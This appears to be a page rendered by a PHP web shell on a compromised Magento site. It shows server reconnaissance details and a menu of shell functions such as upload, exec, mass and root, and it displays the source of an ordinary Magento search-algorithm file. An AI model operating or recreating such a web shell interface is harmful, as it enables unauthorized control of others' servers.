Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 15:54:53
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Search/Dynamic/Algorithm/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Search/Dynamic/Algorithm/Improved.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Search\Dynamic\Algorithm; use Magento\Framework\DB\Ddl\Table; use Magento\Framework\Search\Adapter\OptionsInterface; use Magento\Framework\Search\Dynamic\Algorithm; use Magento\Framework\Search\Dynamic\DataProviderInterface; use Magento\Framework\Search\Request\BucketInterface; class Improved implements AlgorithmInterface { /** * @var Algorithm */ private $algorithm; /** * @var DataProviderInterface */ private $dataProvider; /** * @var OptionsInterface */ private $options; /** * @param DataProviderInterface $dataProvider * @param Algorithm $algorithm * @param OptionsInterface $options */ public function __construct( DataProviderInterface $dataProvider, Algorithm $algorithm, OptionsInterface $options ) { $this->algorithm = $algorithm; $this->dataProvider = $dataProvider; $this->options = $options; } /** * @inheritdoc */ public function getItems( BucketInterface $bucket, array $dimensions, \Magento\Framework\Search\Dynamic\EntityStorage $entityStorage ) { $aggregations = $this->dataProvider->getAggregations($entityStorage); $options = $this->options->get(); if ($aggregations['count'] < $options['interval_division_limit']) { return []; } $this->algorithm->setStatistics( $aggregations['min'], $aggregations['max'], $aggregations['std'], $aggregations['count'] ); $this->algorithm->setLimits($aggregations['min'], $aggregations['max']); $interval = $this->dataProvider->getInterval($bucket, $dimensions, $entityStorage); $data = $this->algorithm->calculateSeparators($interval); $data[0]['from'] = 0; $dataSize = count($data); for ($key = 0; $key < $dataSize; $key++) { if (isset($data[$key + 1])) { $data[$key]['to'] = $data[$key + 1]['from']; } } return $data; } }